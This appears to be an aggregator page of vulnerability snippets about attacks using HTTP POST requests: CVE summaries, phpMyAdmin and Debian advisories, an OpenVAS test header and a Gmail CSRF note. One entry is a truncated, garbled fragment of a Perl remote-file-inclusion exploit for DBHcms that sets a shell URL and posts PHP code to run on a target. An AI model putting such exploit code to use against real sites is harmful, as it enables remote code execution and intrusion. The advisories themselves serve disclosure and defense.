Design/Logic Flaw

Unspecified vulnerability in phpMyAdmin before 2.11.5.2, when running on shared hosts, allows remote authenticated users with CREATE table permissions to read arbitrary files via a crafted HTTP POST request, related to use of an undefined UploadDir variable...

CVE-2008-1924

Unspecified vulnerability in phpMyAdmin before 2.11.5.2, when running on shared hosts, allows remote authenticated users with CREATE table permissions to read arbitrary files via a crafted HTTP POST request, related to use of an undefined UploadDir variable...

CVE-2008-1924

Unspecified vulnerability in phpMyAdmin before 2.11.5.2, when running on shared hosts, allows remote authenticated users with CREATE table permissions to read arbitrary files via a crafted HTTP POST request, related to use of an undefined UploadDir variable...

File disclosure on shared hosts via a crafted HTTP POST request.

PMASA-2008-3 Announcement-ID: PMASA-2008-3 Date: 2008-04-22 Updated: 2008-04-27 Summary File disclosure on shared hosts via a crafted HTTP POST request. Description We received an advisory from Cezary Tomczak, and we wish to thank him for his work. It is possible to read the contents of any file...

Integer overflow

Integer overflow in the wsgetpostvars function in Firefly Media Server formerly mt-daapd 0.2.4.1 0.9r1696-1.2 on Debian allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via an HTTP POST request with a large Content-Length...

CVE-2008-1771

Integer overflow in the wsgetpostvars function in Firefly Media Server formerly mt-daapd 0.2.4.1 0.9r1696-1.2 on Debian allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via an HTTP POST request with a large Content-Length...

CVE-2008-1771

CVE-2008-1771 describes an integer overflow in ws_getpostvars in mt-daapd (Firefly Media Server) v0.2.4.1 and related builds, triggered by a large HTTP POST Content-Length. This can cause a heap buffer overflow with potential remote code execution, alongside denial of service. Connected advisorie...

CVE-2008-1771

Integer overflow in the wsgetpostvars function in Firefly Media Server formerly mt-daapd 0.2.4.1 0.9r1696-1.2 on Debian allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via an HTTP POST request with a large Content-Length...

dbhcms-rfi.txt

!/usr/bin/perl DBHcms $shellurl = "http://localhost/s.txt"; print " DBHcms ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to evaluate? "; chomp$code=; $code = s/|new; $ua-timeout10; $ua-envproxy; $response = $ua-post$target,...

Symantec Backup Exec系统还原管理器FileUpload类非授权文件上传漏洞

BUGTRAQ ID: 27487 CVECAN ID: CVE-2008-0457 Symantec Backup Exec是一款全面的数据备份解决方案。 Symantec Backup Exec系统还原管理器的运行在Symantec LiveState Apache Tomcat服务器（TCP 8080端口）上的FileUpload类存在安全漏洞。如果远程攻击者向该服务器提交了恶意的HTTP POST请求的话，就可以向公开可访问的web目录上传JSP脚本，导致执行任意代码。 Symantec Backup Exec System Recovery Manager 7.0.1...

Debian Security Advisory DSA 1380-1 (elinks)

The remote host is missing an update to elinks announced via advisory DSA 1380-1. OpenVAS Vulnerability Test $Id: deb13801.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 1380-1 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

Debian: Security Advisory (DSA-1380-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2002-2400

CVE-2002-2400 describes a buffer overflow in LibHTTPD 1.2’s httpdProcessRequest function. An attacker can send a long HTTP POST request to trigger a crash and potentially execute arbitrary code, enabling remote compromise without authentication. The issue is documented with a high-severity impact...

CVE-2002-2400

Buffer overflow in the httpdProcessRequest function in LibHTTPD 1.2 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via a long HTTP POST request...

CVE-2003-1490

SonicWall Pro running firmware 6.4.0.1 allows remote attackers to cause a denial of service device reset via a long HTTP POST to the internal interface, possibly due to a buffer overflow...

CVE-2002-2258

Moby NetSuite allows remote attackers to cause a denial of service crash via an HTTP POST request with a 1 large integer or 2 non-numeric value in the Content-Length header, which causes an access violation after a failed atoi function call...

CVE-2002-2258

CVE-2002-2258 affects Moby NetSuite. A remote attacker can crash the service by sending an HTTP POST with a Content-Length header containing a large integer or non-numeric value, triggering an access violation after a failed atoi(). The documents do not provide any remediation, exploit details, o...

[SECURITY] [DSA 1380-1] New elinks packages fix information disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA 1380-1 [email protected] http://www.debian.org/security/ Steve Kemp October 2nd, 2007 http://www.debian.org/security/faq -...

DSA-1380-1 elinks - information disclosure

Bulletin has no description...

Google Gmail cross-site request forgery vulnerability

Overview According to public reports, Google Gmail contained a cross-site request forgery XSRF vulnerability that allowed attackers to create email filters that could forward mail and attachments to arbitrary email addresses. Description Google Gmail is a web-based mail service. Gmail provides...